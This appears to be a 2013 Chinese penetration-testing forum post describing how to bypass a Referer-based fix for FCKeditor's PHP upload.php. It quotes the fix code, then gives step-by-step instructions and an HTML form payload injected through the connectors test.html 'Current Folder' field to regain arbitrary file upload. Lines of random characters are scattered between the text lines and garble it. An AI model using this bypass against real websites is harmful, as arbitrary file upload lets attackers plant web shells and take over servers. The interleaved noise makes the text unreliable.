中国网络渗透测试联盟
标题:
fckeditor 漏洞修复后的二次利用
[打印本页]
作者:
admin
时间:
2013-1-11 21:12
标题:
fckeditor 漏洞修复后的二次利用
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
+ z- ]: @# {( c, K8 a. n% g
网上给出的修复方案是
! A7 c6 K. n* S. d# G& T( B
修复方法,删除FCK编辑器用其他的编辑器
2 ]( e1 J3 z9 Z4 J( W ~
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
1 Q f. a% a+ v4 f0 m6 Y" ]
在
6 v, l6 Z) Q, p6 ?$ M' m
require(‘config.php’);
4 ~! [) T2 m/ l# A+ Y; O
require(‘util.php’);
5 I. l; D6 u8 k# a( K+ U
的下面添加以下代码—————————–
, G, P6 T) T! c5 `9 \+ h+ L8 q
//防止外部提交
0 j* T% L* [( a
function outsidepost()
' _! k" o% y8 ]9 o. y
{
3 x% f% q( ^( ]! Q
$servername=$_SERVER['SERVER_NAME'];
) d: U7 ~( }) \2 k* C8 |
$sub_from=@$_SERVER['HTTP_REFERER'];
% `0 R9 N" A% Y9 ]
$sub_len=strlen($servername);
1 I) G9 b% d; Q5 E6 \; e
$checkfrom=substr($sub_from,7,$sub_len);
3 H4 E! A. `. K+ w6 a" ` j
if($checkfrom!=$servername){
4 A+ h$ h# e3 w' z: l
echo(“you don’t outsidepost!”);
4 S9 n* b {$ Y+ x1 n# w
exit;
2 _& Q) e1 d! D& | A
}
3 d5 J+ k& f$ @, G' a. d0 o. ~+ B
}
( d9 K# E1 {" t6 O9 ~- M
outsidepost();
v9 G1 T: M# @7 C
防止外部提交,但是没有防止内部提交,
3 _4 L5 }6 k! y" h% M: O. \8 A
利用方法:
. _( x& i" ]/ C }' w4 ]
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
! P7 G- n: \& }/ E7 f+ p
2,在Current Folder 框输入
, A, e$ x {$ l6 v: t6 N. s
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
: p* a5 }$ D, f
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
6 L2 `% g2 J6 ~3 G
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2